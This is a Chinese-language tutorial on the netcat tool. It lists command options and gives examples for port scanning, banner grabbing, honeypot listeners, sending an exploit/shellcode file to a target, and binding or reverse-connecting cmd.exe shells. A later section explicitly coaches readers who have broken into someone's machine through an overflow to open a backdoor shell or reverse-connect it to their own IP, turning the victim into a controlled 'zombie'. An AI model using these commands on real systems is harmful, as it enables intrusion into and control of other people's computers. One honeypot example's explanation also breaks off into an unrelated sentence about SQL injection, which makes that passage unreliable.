NC工具的使用说明（1）

NC工具的使用说明...
nc使用说明

参数介绍： 
nc.exe -h即可看到各参数的使用方法。 
基本格式：nc [-options] hostname port[s] [ports] ... 
nc -l -p port [options] [hostname] [port]

-d 后台模式 
-e prog 程序重定向，一旦连接，就执行 [危险!!] 
-g gateway source-routing hop point[s], up to 8 
-G num source-routing pointer: 4, 8, 12, ... 
-h 帮助信息 
-i secs 延时的间隔 
-l 监听模式，用于入站连接 
-L 连接关闭后,仍然继续监听 
-n 指定数字的IP地址，不能用hostname 
-o file 记录16进制的传输 
-p port 本地端口号 
-r 随机本地及远程端口 
-s addr 本地源地址 
-t 使用TELNET交互方式 
-u UDP模式 
-v 详细输出--用两个-v可得到更详细的内容 
-w secs timeout的时间 
-z 将输入输出关掉--用于扫描时

端口的表示方法可写为M-N的范围格式。

===========================================================================================
基本用法：

大概有以下几种用法：

1)连接到REMOTE主机，例子： 
格式：nc -nvv 192.168.x.x 80 
讲解：连到192.168.x.x的TCP80端口

2)监听LOCAL主机，例子： 
格式：nc -l -p 80 
讲解：监听本机的TCP80端口

3)扫描远程主机，例子： 
格式：nc -nvv -w2 -z 192.168.x.x 80-445 
讲解：扫描192.168.x.x的TCP80到TCP445的所有端口

4)REMOTE主机绑定SHELL，例子： 
格式：nc -l -p 5354 -t -e c:winntsystem32cmd.exe 
讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口

5)REMOTE主机绑定SHELL并反向连接，例子： 
格式：nc -t -e c:winntsystem32cmd.exe 192.168.x.x 5354 
讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口

以上为最基本的几种用法（其实NC的用法还有很多， 
当配合管道命令“|”与重定向命令“<”、“>”等等命令功能更强大......）。

===========================================================================================
高级用法：

6)作攻击程序用，例子： 
格式1：type.exe c:exploit.txt|nc -nvv 192.168.x.x 80 
格式2：nc -nvv 192.168.x.x 80 < c:exploit.txt 
讲解：连接到192.168.x.x的80端口，并在其管道中发送c:exploit.txt的内容(两种格式确有相同的效果， 
真是有异曲同工之妙:P)

附：c:exploit.txt为shellcode等

7)作蜜罐用[1]，例子： 
格式：nc -L -p 80 
讲解：使用-L(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止

8)作蜜罐用[2]，例子： 
格式：nc -L -p 80 > c:log.txt 
讲解：使用-L可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到c:log.txt中，如果把‘>’ 
改为‘>>’即可以追加日志

附：c:log.txt为日志等

9)作蜜罐用[3]，例子：

格式1：nc -L -p 80 < c:honeypot.txt

格式2：type.exe c:honeypot.txt|nc -L -p 80

讲解：使用-L可以不停地监听某一个端口，直到ctrl+c为止，并把c:honeypot.txt的内容‘送’入其管道中如果攻击者知道应用会将表单中输入的内容直接用于验证身份的查询，他就会尝试输入某些特殊的SQL字符串篡改查询改变其原来的功能，欺骗系统授予访问权限。

=========================================================================================

第一个: 

nc -l -v -p 7626 
这就是打开本地的7626端口进行监听，并反馈连接信息这样如果有扫描冰河木马的人会认为你中了木马开放了7626，和“小猪快跑”的功能有点象，再加个批处理文件一起用的话就是一个“小猪快跑”了

如果要监视是否有入侵本地80端口的行为，并记下来，用这个命令： 
nc -l -p 80  >>c:\\日志.dat 
这样，凡是有针对本机80端口的攻击都会被记录下来的

二、 
如果你通过溢出进入了别人的机器，就可以运行： 
nc -l -p 123 -e cmd.exe 
或者是: nc -l -p 123 -t 
作用都是以cmd.exe来响应到机器上123端口的连接 
这样就把溢出的主机变成了一台telnet肉鸡了啊 
你也可一用命令让肉鸡主动连接你的主机,假设我的IP是192.168.0.1 
在肉鸡上运行： nc -e cmd.exe 192.168.0.1 777 
再在本地机器上运行： nc -l -p 777 
意思是让肉鸡将cmd.exe(就是个shell)主动响应到你电脑的777端口 
你再在本地机上监听777端口，这样就进入了对方的cmd了 
这也微十时毫 反弹端口式木马的原理了。

三、 
用这个命令： 
nc -v 192.168.0.25 80 
就获得了192.168.0.25的80端口的信息 
可以获得IIS版本等很多重要信息 的

四、 
你也可以将NC作为扫描器使用： 
nc -v -z 192.168.0.25 1-100 
扫描192.168.0.25的1到100间的TCP端口

用nc -v -z -u 192.168.0.25 1-100 
这是扫描1到00间的UDP端口